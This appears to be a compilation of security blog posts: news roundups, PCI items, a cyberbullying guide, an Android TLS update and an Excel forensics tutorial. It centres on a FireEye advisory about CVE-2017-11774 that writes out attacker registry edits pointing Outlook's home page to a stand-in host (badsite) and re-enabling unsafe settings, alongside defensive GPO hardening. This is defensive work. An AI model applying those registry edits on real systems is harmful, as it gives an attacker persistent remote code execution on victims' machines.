Following an April 2017 complaint, the Office of Civil Rights has issued a fine of $2.175 million after discovering that Sentara Hospitals had distributed the private health information for 577 patients, but only reported eight affected. Moreover, it took over a year for the healthcare provider to take full responsibility for the breach and begin correcting their security policies for handling sensitive information. HIPAA violations are extremely time-sensitive and the slow response from Sentara staff could act as a lesson for other organizations to ensure similar events don’t reoccur.

Android Vulnerability Allows Hackers Easy Access

Researchers have identified a new Android exploit that allows hackers access to banking applications by quickly stealing login credentials after showing the victim a legitimate app icon, requesting additional permissions, and then sending the user to their expected app. Even more worrisome, this vulnerability exists within all current versions of AndroidOS and, while not found on the Google Play Store, some illicit downloaders were distributing it.

Smith & Wesson Hit by Magecart

In the days leading up to Black Friday, one of the largest retail shopping days of the year, malicious skimming code was placed onto the computer systems and, subsequently, the website of Smith & Wesson. In a slight break from the normal Magecart tactics, they attackers were masquerading as a security vendor to make their campaign less visible. The card-skimming code was initially placed onto the website on November 27 and was still active through December 2.

The post Cyber News Rundown: ZeroCleare Malware appeared first on Webroot Blog.

Accelerated Digital Innovation to impact the Cybersecurity Threat Landscape in 2020

Its December and the Christmas lights are going up, so it can't be too early for cyber predictions for 2020.   With this in mind, Richard Starnes, Chief Security Strategist at Capgemini, sets out what the priorities will be for businesses in 2020 and beyond.

Accelerated digital innovation is a double-edged sword that will continue to hang over the cybersecurity threat landscape in 2020.  As businesses rapidly chase digital transformation and pursue the latest advancements in 5G, cloud and IoT, they do so at the risk of exposing more of their operations to cyber-attacks. These technologies have caused an explosion in the number of end-user devices, user interfaces, networks and data; the sheer scale of which is a headache for any cybersecurity professional. 

In order to aggressively turn the tide next year, cyber analysts can no longer avoid AI adoption or ignore the impact of 5G. 

AI Adoption
Hackers are already using AI to launch sophisticated attacks – for example AI algorithms can send ‘spear phishing’ tweets six times faster than a human and with twice the success. In 2020, by deploying intelligent, predictive systems, cyber analysts will be better positioned to anticipate the exponentially growing number of threats.

The Convergence of IT and OT
At the core of the Industry 4.0 trend is the convergence of operations technology (OT) and information technology (IT) networks, i.e. the convergence of industrial and traditional corporate IT systems. While this union of these formerly disparate networks certainly facilitates data exchange and enables organisations to improve business efficiency, it also comes with a host of new security concerns.

5G and IoT
While 5G promises faster speed and bandwidth for connections, it also comes with a new generation of security threats. 5G is expected to make more IoT services possible and the framework will no longer neatly fit into the traditional security models optimised for 4G. Security experts warn of threats related to the 5G-led IoT growth anticipated in 2020, such as a heightened risk of Distributed Denial-of-Service (DDoS) attacks.

Death of the Password
2020 could see organisations adopt new and sophisticated technologies to combat risks associated with weak passwords.

More Power to Data Protection Regulations
In 2020, regulations like GDPR, The California Consumer Privacy Act and PSD2 are expected to get harsher. We might also see announcements of codes of conduct specific to different business sectors like hospitality, aviation etc. All this will put pressure on businesses to make data security a top consideration at the board level.

Has WhatsApp become a potential career assassin? | Afua Hirsch

The app helped connect me to an inspiring sisterhood. But the case of police officer Robyn Williams shows unopened messages can be a legal minefield

We need to talk about WhatsApp. When the little green speech bubble first showed up in my life, I greeted it with awe and wonder. I even wrote a little love letter to its ability to connect with a virtual black sisterhood – the kind that rarely exists in our too-undiverse workplaces in real life – in my first book. It became the perfect platform to share experiences, frustrations, strategies and ideas.

WhatsApp group communities proliferated on my phone – they were education, community and activism all in one place. It was great.

Continue reading...

Be Alert this Holiday Season: Payment Security Tips for Businesses

On this blog we explore the challenges around security of payment data during the hectic holiday season and provide tips and best practices to help restaurants better secure their payment data.  The following is a Q & A with Troy Leach, Senior Vice President of the PCI Security Standards Council and Laura Chadwick, Program Director, Technology & Innovation of the National Restaurant Association about the importance of cybersecurity this holiday season.

Just Published: PCI Contactless Payments on COTS

The PCI Security Standards Council (PCI SSC) has published a new data security standard for solutions that enable merchants to accept contactless payments using a smartphone or other commercial off-the-shelf (COTS) mobile device with near-field communication (NFC). Here’s what you need to know about the new PCI Contactless Payments on COTS (CPoC™) Standard and its supporting validation program.

Breaking the Rules: A Tough Outlook for Home Page Attacks (CVE-2017-11774)

Attackers have a dirty little secret that is being used to conduct big intrusions. We’ll explain how they're "unpatching" an exploit and then provide new Outlook hardening guidance that is not available elsewhere. Specifically, this blog post covers field-tested automated registry processing for registry keys to protect against attacker attempts to reverse Microsoft’s CVE-2017-11774 patch functionality.

Despite multiple warnings from FireEye and U.S. Cyber Command, we have continued to observe an uptick in successful exploitation of CVE-2017-11774, a client-side Outlook attack that involves modifying victims’ Outlook client homepages for code execution and persistence. The Outlook Home Page feature allows for customization of the default view for any folder in Outlook. This configuration can allow for a specific URL to be loaded and displayed whenever a folder is opened. This URL is retrieved either via HTTP or HTTPS - and can reference either an internal or external network location. When Outlook loads the remote URL, it will render the contents using the Windows DLL ieframe.dll, which can allow an attacker to achieve remote code execution that persists through system restarts.

We have observed multiple threat actors adopting the technique and eventually becoming a favorite for Iranian groups in support of both espionage and reportedly destructive attacks. FireEye first observed APT34 use CVE-2017-11774 in June 2018, followed by adoption by APT33 for a significantly broader campaign beginning in July 2018 and continuing for at least a year. To further increase awareness of this intrusion vector, our Advanced Practices team worked with MITRE to update the ATT&CK framework to include CVE-2017-11774 home page persistence within technique T1137 – “Office Application Startup”.

For more information on how CVE-2017-11774 exploitation works, how APT33 implemented it alongside password spraying, and some common pitfalls for incident responders analyzing this home page technique, see the “RULER In-The-Wild” section of our December 2018 OVERRULED blog post.

Going Through a Rough Patch

On October 10, 2017, Microsoft released patches for Microsoft Outlook to protect against this technique.

  • KB4011196 (Outlook 2010)
  • KB4011178 (Outlook 2013)
  • KB4011162 (Outlook 2016)

Following the mid-2018 abuse by Iranian threat actors first detailed in our OVERRULED blog post, the FireEye Mandiant team began to raise awareness of how the patch could be subverted. Doug Bienstock discussed in December 2018 that the simple roll back of the patch as a part of Mandiant’s Red Team operations – and alluded to observing authorized software that also automatically removes the patch functionality. In response to U.S. Cyber Command’s mid-2019 warning about APT33’s use of the exploit, we raised concern with DarkReading over the ability to override the CVE-2017-11774 patch without escalated privileges.

Without continuous reinforcement of the recommended registry settings for CVE-2017-11774 hardening detailed within this blog post, an attacker can add or revert registry keys for settings that essentially disable the protections provided by the patches.

An attacker can set a home page to achieve code execution and persistence by editing the WebView registry keys. The “URL” subkey will enable and set a home page for the specified mail folder within the default mailbox. Setting this registry key to a valid URL enables the home page regardless of the patch being applied or not. Although the option will not be accessible from the Outlook user interface (UI), it will still be set and render. Importantly, these keys are set within the logged-on user’s Registry hive. This means that no special privileges are required to edit the Registry and roll back the patch. The FireEye Red Team found that no other registry modifications were required to set a malicious Outlook homepage.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\ Outlook\WebView\Inbox
“URL”= http://badsite/homepage-persist.html

There are additional keys within the Registry that can be modified to further roll back the patch and expose unsafe options in Outlook. The following setting can be used to re-enable the original home page tab and roaming home page behavior in the Outlook UI.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
“EnableRoamingFolderHomepages”= dword:00000001

The following setting will allow for folders within secondary (non-default) mailboxes to leverage a custom home page.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
“NonDefaultStoreScript"= dword:00000001

The following setting will allow for “Run as a Script” and “Start Application” rules to be re-enabled.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
“EnableUnsafeClientMailRules"= dword:00000001

Etienne Stalmans, a developer of SensePost’s RULER and the credited responsible discloser of CVE-2017-11774, chimed in about similar concerns on the patch that were re-raised after seeing a September 2018 blog post about applying the same technique to Outlook Today’s home page that is stored at HKCU\Software\Microsoft\Office\<Outlook Version>\Outlook\Today\UserDefinedUrl. Both Etienne and the September 2018 blog post’s author describe what Microsoft has suggested as a key mitigating factor – that the exploit and rolling back the patch require some form of initial access. This is consistent with Microsoft’s position and their 2007 immutable laws of security blog, which were reiterated when we contacted MSRC prior to publishing this blog post.

We agree that for the CVE-2017-11774 patch override vector to be successful, a bad guy has to persuade you to run his program (law #1) and alter your operating system (law #2). However, the technique is under-reported, no public mitigation guidance is available, and – as a fresh in-the-wild example demonstrates in this post – that initial access and patch overriding can be completely automated.

A Cavalier Handling of CVE-2017-11774

The Advanced Practices team monitors for novel implementations of attacker techniques including this patch override, and on November 23, 2019 a uniquely automated phishing document was uploaded to VirusTotal. The sample, “TARA Pipeline.xlsm” (MD5: ddbc153e4e63f7b8b6f7aa10a8fad514), launches malicious Excel macros combining several techniques, including:

  • execution guardrails to only launch on the victim domain (client redacted in screenshot)
  • custom pipe-delimited character substitution obfuscation
  • a creative implementation of CVE-2017-11774 using the lesser-known HKCU\Software\Microsoft\Office\<Outlook Version>\Outlook\WebView\Calendar\URL registry key
  • a URL pointing to the payload hosted in Azure storage blobs (* – a creative technique that allows an attacker-controlled, swappable payload to be hosted in a legitimate service
  • and most importantly for this blog post – a function to walk through the registry and reverse the CVE-2017-11774 patch functionality for any version of Microsoft Outlook

These features of the malicious spear phishing Excel macro can be seen in Figure 1.

Figure 1: Malicious macros automatically reverting the CVE-2017-11774 patch

Pay special attention to the forced setting of EnableRoamingFolderHomepages to “1” and the setup of “Calendar\URL” key to point to an attacker-controlled payload, effectively disabling the CVE-2017-11774 patch on initial infection.

In support of Managed Defense, our Advanced Practices team clusters and tactically attributes targeted threat activity – whether the intrusion operators turn out to be authorized or unauthorized – in order to prioritize and deconflict intrusions. In this case, Nick Carr attributed this sample to an uncategorized cluster of activity associated with authorized red teaming, UNC1194 , but you might know them better as the TrustedSec red team whose founder, Dave Kennedy, appeared on a previous episode of State of the Hack. This malicious Excel file appears to be a weaponized version of a legitimate victim-created document that we also obtained – reflecting a technique becoming more common with both authorized and unauthorized intrusion operators. For further analysis and screenshots of UNC1194’s next stage CVE-2017-11774 payload for initial reconnaissance, target logging visibility checks, and domain-fronted Azure command and control – see here. Readers should take note that the automated patch removal and home page exploitation establishes attacker-controlled remote code execution and allows these [thankfully authorized] attackers to conduct a full intrusion by swapping out their payload remotely for all follow-on activity.

Locking Down the Registry Keys Using Group Policy Object (GPO) Enforcement

As established, the patches for CVE-2017-11774 can be effectively “disabled” by modifying registry keys on an endpoint with no special privileges. The following registry keys and values should be configured via Group Policy to reinforce the recommended configurations in the event that an attacker attempts to reverse the intended security configuration on an endpoint to allow for Outlook home page persistence for malicious purposes.

To protect against an attacker using Outlook’s WebView functionality to configure home page persistence, the following registry key configuration should be enforced.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\WebView
"Disable"= dword:00000001

Note: Prior to enforcing this hardening method for all endpoints, the previous setting should be tested on a sampling of endpoints to ensure compatibility with third-party applications that may leverage webviews.

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Webview
        • Value Name: Disable
      • Value Type: REG_DWORD
      • Value Data: 00000001

Figure 2: Disabling WebView registry setting

Included within the Microsoft Office Administrative Templates, a GPO setting is available which can be configured to disable a home page URL from being set in folder properties for all default folders, or for each folder individually.  If set to “Enabled”, the following GPO setting essentially enforces the same registry configuration (disabling WebView) as previously noted.

User Configuration > Policies > Administrative Templates > Microsoft Outlook <version> > Folder Home Pages for Outlook Special Folders > Do not allow Home Page URL to be set in folder Properties

The registry key configuration to disable setting an Outlook home page via the Outlook UI is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"EnableRoamingFolderHomepages"= dword:00000000

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: EnableRoamingFolderHomepages
      • Value Type: REG_DWORD
      • Value Data: 00000000

Figure 3: EnableRoamingFolderHomepages registry setting

Additionally, a home page in Outlook can be configured for folders in a non-default datastore. This functionality is disabled once the patch has been installed, but it can be re-enabled by an attacker. Just like this blog post’s illustration of several different home page URL registry keys abused in-the-wild – including the Outlook Today setting from September 2018 and the Calendar URL setting from UNC1194’s November 2019 malicious macros – these non-default mailstores provide additional CVE-2017-11774 attack surface.

The registry key configuration to enforce the recommended registry configuration is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security
"NonDefaultStoreScript"= dword:00000000

To enforce the expected hardened configuration of the registry key for non-default mailstores using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: NonDefaultStoreScript
      • Value Type: REG_DWORD
      • Value Data: 00000000

Figure 4: NonDefaultStoreScript registry setting

Included within the previously referenced Microsoft Office Administrative Templates, a GPO setting is available which can be configured to not allow folders in non-default stores to be set as folder home pages.

User Configuration > Policies > Administrative Templates > Microsoft Outlook <version> > Outlook Options > Other > Advanced > Do not allow folders in non-default stores to be set as folder home pages

While you’re locking things down, we thought that readers would also want to ensure they are locked down against RULER’s other modules for rules-based persistence and forms-based persistence. This last recommendation ensures that the rule types required by the other RULER modules are no longer permissible on an endpoint. While not CVE-2017-11774, this is closely related and this last setting is consistent with Microsoft’s prior guidance on rules and forms persistence.

The registry key configuration to protect against an attacker re-enabling “Run as a Script” and “Start Application” rules is as follows.

HKEY_CURRENT_USER\Software\Microsoft\Office\<Outlook Version>\Outlook\Security\
"EnableUnsafeClientMailRules"= dword:00000000

To enforce the expected hardened configuration of the registry key using a GPO, the following setting can be configured.

  • User Configuration > Preferences > Windows Settings > Registry
    • New > Registry Item
      • Action: Update
      • Key Path: Software\Microsoft\Office\<Outlook Version>\Outlook\Security
        • Value Name: EnableUnsafeClientMailRules
      • Value Type: REG_DWORD
      • Value Data: 00000000

Figure 5: EnableUnsafeClientMailRules registry setting

Once all of aforementioned endpoint policies are configured – we recommend a final step to protect these settings from unauthorized tampering. To ensure that the registry settings (configured via GPO) are continuously assessed and applied to an endpoint – even if the registry value was intentionally reversed by an attacker – the following GPO settings should also be configured and enforced:

  • Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure security policy processing
    • Enabled - Process even if the Group Policy objects have not changed
  • Computer Configuration > Policies > Administrative Templates > System > Group Policy > Configure registry policy processing
    • Enabled - Process even if the Group Policy objects have not changed

Figure 6: Group Policy processing settings

For more environment hardening advice informed by front-line incident response, reach out to our Mandiant Security Transformation Services consulting team.

Let’s Go Hunt (doo doo doo)

With this blog post, we’re providing an IOC for monitoring CVE-2017-11774 registry tampering – while written for FireEye Endpoint Security (HX) in the OpenIOC 1.1 schema, this is a flexible behavioral detection standard that supports real-time and historical events and the logic can be repurposed for other endpoint products.

The Yara hunting rule provided by Nick Carr at the end the OVERRULED blog post still captures payloads using CVE-2017-11774, including all of those used in intrusions referenced in this post, and can also be used to proactively identify home page exploits staged on adversary infrastructure. Further FireEye product detection against CVE-2017-11774 is also covered in the OVERRULED blog post.

If you’ve read the OVERRULED post (or are tired of hearing about it) but want some additional information, we recommend:

Interesting MITRE ATT&CK techniques explicitly referenced in this blog post:





Office Application Startup

Nick Carr contributed CVE-2017-11774 on behalf of FireEye for expansion of this technique


Execution Guardrails

Nick Carr contributed this new technique to MITRE ATT&CK and it is used within the UNC1194 red team sample in this blog post


The authors would like to acknowledge all of those at FireEye and the rest of the security industry who have combatted targeted attackers leveraging creative techniques like home page persistence, but especially the analysts in Managed Defense SOC working around the clock to secure our customers and have disrupted this specific attack chain several times. We want to thank the SensePost team – for their continued creativity, responsible disclosure of CVE-2017-11774, and their defensive-minded release of NotRuler – as well as the TrustedSec crew for showing us some innovative implementations of these techniques and being great to coordinate with on this blog post. Lastly, thanks to Aristotle who has already offered what can only be interpreted as seasoned incident response and hardening advice for those who have seen RULER’s home page persistence in-the-wild: “He who is to be a good ruler must have first been ruled.”

What You Need to Know about Cyberbullying

Reading Time: ~ 2 min.

Have you noticed a decrease in your child’s happiness or an increase in their anxiety? Cyberbullying might be the cause to these behavioral changes.

Bullying is no longer confined to school playgrounds and neighborhood alleys. It has long moved into the online world, thanks to the easy access to technology. Between Twitter, SnapChat, TikTok, Instagram, WhatsApp, or even standard SMS texts, emails and instant messages, cyberbullies have an overwhelming number of technical avenues to exploit.

While cyberbullying can happen to anyone, studies have shown that teens are usually more susceptible to it. The percentage of individuals – middle and high school students from across the U.S. — who have experienced cyberbullying at some point, has more than doubled (19% to 37%) from 2007 to 2019, according to data from the Cyberbullying Research Center.

Before you teach your kids how to respond to cyberbullying, it is important to know what it entails.

Check out our Cybersecurity Education Resources

What is Cyberbullying?

Cyberbullying is bullying that takes place over digital devices like cell phones, tablets, or computers. Even smaller devices like smartwatches and iPods can facilitate cyberbullying. Today, social media platforms act like a breeding ground for cyberbullying.

Cyberbullying usually begins with teasing that turns to harassment. From there it can evolve in many ways, such as impersonation and catfishing, doxxing, or even blackmail through the use of compromising photos.

Catfishing is the process of creating a fake identity online and using it to lure people into a relationship. Teens often engage in impersonation online to humiliate their targets and it is a form of cyberbullying.

Doxxing is used as a method of attack that includes searching, collecting and publishing personal or identifying information about someone on the internet.

Identifying the Warning Signs

When it comes to cyberbullying, just like traditional bullying, there are warning signs for parents to watch for in their child. Although the warning signs may vary, Nemours Children’s Health System has identified the most common ones as:

  • being upset or emotional during or after internet or phone time
  • being overly protective of their digital life and mobile devices
  • withdrawal from family members, friends, and activities
  • missing or avoiding school 
  • a dip in school performance
  • changes in mood, behavior, sleep, or appetite
  • suddenly avoiding the computer or cellphone
  • being nervous or jumpy when getting an instant message, text, or email
  • avoiding conversations about their cell phone activities

Remember, there are free software and apps available to help you restrict content, block domains, or even monitor your child’s online activity.

While having a child who is being cyberbullied is every parent’s nightmare, it’s equally important to understand if your child is cyberbullying others.

Do you believe your child is a cyberbully? That difficult and delicate situation needs its own blog post—but don’t worry, we have you covered.

You’ll also find many cyberbullying prevention and resolution resources on both federal and local levels, as well as support from parents going through similar issues on our community forum.

Preparing your kids for a world where cyberbullying is a reality isn’t easy, but it is necessary. By creating a safe space for your child to talk to you about cyberbullying, you’re setting the foundation to squash this problem quickly if it arises.

The post What You Need to Know about Cyberbullying appeared first on Webroot Blog.

Securing Emerging Payment Channels

Securing emerging payment channels is a core pillar in the PCI Security Standards Council’s (PCI SSC) strategic framework, which guides how the Council achieves its mission and supports the needs of the global payments industry. In this interview with PCI SSC Standards Officer Emma Sutcliffe, we discuss this pillar and how it’s shaping Council priorities.

Cyber Security Roundup for November 2019

In recent years political motivated cyber-attacks during elections has become an expected norm, so it was no real surprise when the Labour Party reported it was hit with two DDoS cyber-attacks in the run up to the UK general election, which was well publicised by the media. However, what wasn't well publicised was both the Conservative Party and Liberal Democrats Party were also hit with cyber attacks. These weren't nation-state orchestrated cyberattacks either, black hat hacking group Lizard Squad, well known for their high profile DDoS attacks, are believed to be the culprits.

The launch of Disney Plus didn’t go exactly to plan, without hours of the streaming service going live, compromised Disney Plus user accounts credentials were being sold on the black market for as little as £2.30 a pop. Disney suggested hackers had obtained customer credentials from previously leaked identical credentials, as used by their customers on other compromised or insecure websites, and from keylogging malware. It's worth noting Disney Plus doesn’t use Multi-Factor Authentication (MFA), implementing MFA to protect their customer's accounts would have prevented the vast majority of Disney Plus account compromises in my view.

Trend Micro reported an insider stolen around 100,000 customer accounts details, with the data used by cyber con artists to make convincing scam phone calls impersonating their company to a number of their customers. In a statement, Trend Micro said it determined the attack was an inside job, an employee used fraudulent methods to access its customer support databases, retrieved the data and then sold it on. “Our open investigation has confirmed that this was not an external hack, but rather the work of a malicious internal source that engaged in a premeditated infiltration scheme to bypass our sophisticated controls,” the company said. The employee behind it was identified and fired, Trend Micro said it is working with law enforcement in an on-going investigation.

Security researchers found 4 billion records from 1.2 billion people on an unsecured Elasticsearch server. The personal information includes names, home and mobile phone numbers and email addresses and what may be information scraped from LinkedIn, Facebook and other social media sources.

T-Mobile reported a data breach of some their prepaid account customers. A T-Mobile spokesman said “Our cybersecurity team discovered and shut down malicious, unauthorized access to some information related to your T-Mobile prepaid wireless account. We promptly reported this to authorities”.

A French hospital was hit hard by a ransomware attack which has caused "very long delays in care". According to a spokesman, medical staff at Rouen University Hospital Centre (CHU) abandon PCs as ransomware had made them unusable, instead, staff returned to the "old-fashioned method of paper and pencil". No details about the strain of the ransomware have been released.

Microsoft released patches for 74 vulnerabilities in November, including 13 which are rated as critical. One of which was for a vulnerability with Internet Explorer (CVE-2019-1429), an ActiveX vulnerability known to be actively exploited by visiting malicious websites.

It was a busy month for blog articles and threat intelligence news, all are linked below.


An Update on Android TLS Adoption

Posted by Bram Bonné, Senior Software Engineer, Android Platform Security & Chad Brubaker, Staff Software Engineer, Android Platform Security

banner illustration with several devices and gaming controller

Android is committed to keeping users, their devices, and their data safe. One of the ways that we keep data safe is by protecting network traffic that enters or leaves an Android device with Transport Layer Security (TLS).

Android 7 (API level 24) introduced the Network Security Configuration in 2016, allowing app developers to configure the network security policy for their app through a declarative configuration file. To ensure apps are safe, apps targeting Android 9 (API level 28) or higher automatically have a policy set by default that prevents unencrypted traffic for every domain.

Today, we’re happy to announce that 80% of Android apps are encrypting traffic by default. The percentage is even greater for apps targeting Android 9 and higher, with 90% of them encrypting traffic by default.

Percentage of apps that block cleartext by default.

Percentage of apps that block cleartext by default.

Since November 1 2019, all app (updates as well as all new apps on Google Play) must target at least Android 9. As a result, we expect these numbers to continue improving. Network traffic from these apps is secure by default and any use of unencrypted connections is the result of an explicit choice by the developer.

The latest releases of Android Studio and Google Play’s pre-launch report warn developers when their app includes a potentially insecure Network Security Configuration (for example, when they allow unencrypted traffic for all domains or when they accept user provided certificates outside of debug mode). This encourages the adoption of HTTPS across the Android ecosystem and ensures that developers are aware of their security configuration.

Example of a warning shown to developers in Android Studio.

Example of a warning shown to developers in Android Studio.

Example of a warning shown to developers as part of the pre-launch report.

Example of a warning shown to developers as part of the pre-launch report.

What can I do to secure my app?

For apps targeting Android 9 and higher, the out-of-the-box default is to encrypt all network traffic in transit and trust only certificates issued by an authority in the standard Android CA set without requiring any extra configuration. Apps can provide an exception to this only by including a separate Network Security Config file with carefully selected exceptions.

If your app needs to allow traffic to certain domains, it can do so by including a Network Security Config file that only includes these exceptions to the default secure policy. Keep in mind that you should be cautious about the data received over insecure connections as it could have been tampered with in transit.

<base-config cleartextTrafficPermitted="false" />
<domain-config cleartextTrafficPermitted="true">
<domain includeSubdomains="true"></domain>
<domain includeSubdomains="true"></domain>

If your app needs to be able to accept user specified certificates for testing purposes (for example, connecting to a local server during testing), make sure to wrap your element inside a element. This ensures the connections in the production version of your app are secure.

<certificates src="user"/>

What can I do to secure my library?

If your library directly creates secure/insecure connections, make sure that it honors the app's cleartext settings by checking isCleartextTrafficPermitted before opening any cleartext connection.

Android’s built-in networking libraries and other popular HTTP libraries such as OkHttp or Volley have built-in Network Security Config support.

Giles Hogben, Nwokedi Idika, Android Platform Security, Android Studio and Pre-Launch Report teams

Passwords: Our First Line of Defense

Darin Roberts // “Why do you recommend a 15-character password policy when (name your favorite policy here) recommends only 8-character minimum passwords?” I have had this question posed to me a couple of times in the very recent past.   There were 2 separate policies that were shown to me when asking these questions. First was […]

The post Passwords: Our First Line of Defense appeared first on Black Hills Information Security.

Excelerating Analysis – Tips and Tricks to Analyze Data with Microsoft Excel

Incident response investigations don’t always involve standard host-based artifacts with fully developed parsing and analysis tools. At FireEye Mandiant, we frequently encounter incidents that involve a number of systems and solutions that utilize custom logging or artifact data. Determining what happened in an incident involves taking a dive into whatever type of data we are presented with, learning about it, and developing an efficient way to analyze the important evidence.

One of the most effective tools to perform this type of analysis is one that is in almost everyone’s toolkit: Microsoft Excel. In this article we will detail some tips and tricks with Excel to perform analysis when presented with any type of data.

Summarizing Verbose Artifacts

Tools such as FireEye Redline include handy timeline features to combine multiple artifact types into one concise timeline. When we use individual parsers or custom artifact formats, it may be tricky to view multiple types of data in the same view. Normalizing artifact data with Excel to a specific set of easy-to-use columns makes for a smooth combination of different artifact types.

Consider trying to review parsed file system, event log, and Registry data in the same view using the following data.

$SI Created

$SI Modified

File Name

File Path

File Size

File MD5

File Attributes

File Deleted

2019-10-14 23:13:04

2019-10-14 23:33:45







Event Gen Time

Event ID

Event Message

Event Category

Event User

Event System

2019-10-14 23:13:06


A logon was attempted using explicit credentials.

   Security ID:  DomainCorp\Administrator
   Account Name:  Administrator
   Account Domain:  DomainCorp
   Logon ID:  0x1b38fe
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
   Account Name:  VictimUser
   Account Domain:  DomainCorp
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Target Server:
   Target Server Name: DestinationServer
   Additional Information:
Process Information:
   Process ID:  0x5ac
   Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
Network Information:
   Network Address: -
   Port:   -





Key Path





2019-10-14 23:33:46

HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\





Since these raw artifact data sets have different column headings and data types, they would be difficult to review in one timeline. If we format the data using Excel string concatenation, we can make the data easy to combine into a single timeline view. To format the data, we can use the “&” operation with a function to join information we may need into a “Summary” field.

An example command to join the relevant file system data delimited by ampersands could be “=D2 & " | " & C2 & " | " & E2 & " | " & F2 & " | " & G2 & " | " & H2”. Combining this format function with a “Timestamp” and “Timestamp Type” column will complete everything we need for streamlined analysis.


Timestamp Type


2019-10-14 23:13:04

$SI Created

C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525  | Archive | FALSE

2019-10-14 23:13:06

Event Gen Time

4648 | A logon was attempted using explicit credentials.

   Security ID:  DomainCorp\Administrator
   Account Name:  Administrator
   Account Domain:  DomainCorp
   Logon ID:  0x1b38fe
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Account Whose Credentials Were Used:
   Account Name:  VictimUser
   Account Domain:  DomainCorp
   Logon GUID:  {00000000-0000-0000-0000-000000000000}
Target Server:
   Target Server Name: DestinationServer
   Additional Information:
Process Information:
   Process ID:  0x5ac
   Process Name:  C:\Program Files\Internet Explorer\iexplore.exe
Network Information:
   Network Address: -
   Port:   - | Logon | Administrator | SourceSystem

2019-10-14 23:33:45

$SI Modified

C:\Users\attacker\Documents\ | Default.rdp | 485 | c482e563df19a401941c99888ac2f525  | Archive | FALSE

2019-10-14 23:33:46


HKEY_USER\Software\Microsoft\Terminal Server Client\Servers\ | DestinationServer | UsernameHInt | VictimUser

After sorting by timestamp, we can see evidence of the “DomainCorp\Administrator” account connecting from “SourceSystem” to “DestinationServer” with the “DomainCorp\VictimUser” account via RDP across three artifact types.

Time Zone Conversions

One of the most critical elements of incident response and forensic analysis is timelining. Temporal analysis will often turn up new evidence by identifying events that precede or follow an event of interest. Equally critical is producing an accurate timeline for reporting. Timestamps and time zones can be frustrating, and things can get confusing when the systems being analyzed span various time zones. Mandiant tracks all timestamps in Coordinated Universal Time (UTC) format in its investigations to eliminate any confusion of both time zones and time adjustments such as daylight savings and regional summer seasons. 

Of course, various sources of evidence do not always log time the same way. Some may be local time, some may be UTC, and as mentioned, data from sources in various geographical locations complicates things further. When compiling timelines, it is important to first know whether the evidence source is logged in UTC or local time. If it is logged in local time, we need to confirm which local time zone the evidence source is from. Then we can use the Excel TIME()  formula to convert timestamps to UTC as needed.

This example scenario is based on a real investigation where the target organization was compromised via phishing email, and employee direct deposit information was changed via an internal HR application. In this situation, we have three log sources: email receipt logs, application logins, and application web logs. 

The email logs are recorded in UTC and contain the following information:

The application logins are recorded in Eastern Daylight Time (EDT) and contain the following:

The application web logs are also recorded in Eastern Daylight Time (EDT) and contain the following:

To take this information and turn it into a master timeline, we can use the CONCAT function (an alternative to the ampersand concatenation used previously) to make a summary of the columns in one cell for each log source, such as this example formula for the email receipt logs:

This is where checking our time zones for each data source is critical. If we took the information as it is presented in the logs and assumed the timestamps were all in the same time zone and created a timeline of this information, it would look like this:

As it stands the previous screenshot, we have some login events to the HR application, which may look like normal activity for the employees. Then later in the day, they receive some suspicious emails. If this were hundreds of lines of log events, we would risk the login and web log events being overlooked as the time of activity precedes our suspected initial compromise vector by a few hours. If this were a timeline used for reporting, it would also be inaccurate.

When we know which time zone our log sources are in, we can adjust the timestamps accordingly to reflect UTC. In this case, we confirmed through testing that the application logins and web logs are recorded in EDT, which is four hours behind UTC, or “UTC-4”. To change these to UTC time, we just need to add four hours to the time. The Excel TIME function makes this easy. We can just add a column to the existing tables, and in the first cell we type “=A2+TIME(4,0,0)”. Breaking this down:

  • =A2
    • Reference cell A2 (in this case our EDT timestamp). Note this is not an absolute reference, so we can use this formula for the rest of the rows.
  • +TIME
    • This tells Excel to take the value of the data in cell A2 as a “time” value type and add the following amount of time to it:
  • (4,0,0)
    • The TIME function in this instance requires three values, which are, from left to right: hours, minutes, seconds. In this example, we are adding 4 hours, 0 minutes, and 0 seconds.

Now we have a formula that takes the EDT timestamp and adds four hours to it to make it UTC. Then we can replicate this formula for the rest of the table. The end result looks like this:

When we have all of our logs in the same time zone, we are ready to compile our master timeline. Taking the UTC timestamps and the summary events we made, our new, accurate timeline looks like this:

Now we can clearly see suspicious emails sent to (fictional) employees Austin and Dave. A few minutes later, Austin’s account logs into the HR application and adds a new bank account. After this, we see the same email sent to Jake. Soon after this, Jake’s account logs into the HR application and adds the same bank account information as Austin’s. Converting all our data sources to the same time zone with Excel allowed us to quickly link these events together and easily identify what the attacker did. Additionally, it provided us with more indicators, such as the known-bad bank account number to search for in the rest of the logs.

